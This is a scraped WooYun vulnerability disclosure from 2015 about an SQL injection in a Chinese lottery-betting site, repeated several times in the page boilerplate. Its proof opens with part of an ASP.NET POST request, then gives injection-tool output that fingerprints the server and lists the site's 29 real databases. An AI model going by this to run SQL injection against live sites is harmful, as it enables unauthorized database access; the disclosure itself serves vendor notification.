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&__EVENTVALIDATION=/wEWEwLhjrwBAt/45YAPAt/4+f0EAt/4jdoNAt/4obcFAt/4tewCAt/4ycgLAt/43aUDAtbwh+MLAqz7ldQJApn7utMLArPZld0FAqrRkYQDAo3Ku+AOAoeO39sLAojXkbYFAuK8g/YMAuuvoKwEAripj7YKaOdd5UYxAAnl+lohJXzURiN0X23v5AOfljAZMujatfs=&__ASYNCPOST=true&btn_Sub=%E7%A1%AE%E5%AE%9A
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
available databases [29]:
[*] ASPState
[*] BasketBall
[*] ChannelSale
[*] CupData
[*] DeYingOA
[*] EuropeanCup
[*] FootBall
[*] JCData
[*] JingCaiData
[*] master
[*] model
[*] msdb
[*] NewBasketBall
[*] NewFootBall
[*] OlympicData
[*] OscarData
[*] PES2012
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] TouZhuWang
[*] TxoddData
[*] TZData
[*] TZGame
[*] TZJCData
[*] TZShishicai
[*] TZYingXiao
[*] WebFAQ
[*] yzb2014

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-10-16 14:23

厂商回复：

谢谢.路大大.已经转给技术.

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0145868

漏洞标题：投注网某站一处隐秘SQL注入漏洞

相关厂商：投注网

漏洞作者：路人甲

提交时间：2015-10-12 00:02

修复时间：2015-11-30 14:24

公开时间：2015-11-30 14:24

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0145868

漏洞标题：投注网某站一处隐秘SQL注入漏洞

相关厂商：投注网

漏洞作者： 路人甲

提交时间：2015-10-12 00:02

修复时间：2015-11-30 14:24

公开时间：2015-11-30 14:24

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0145868"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云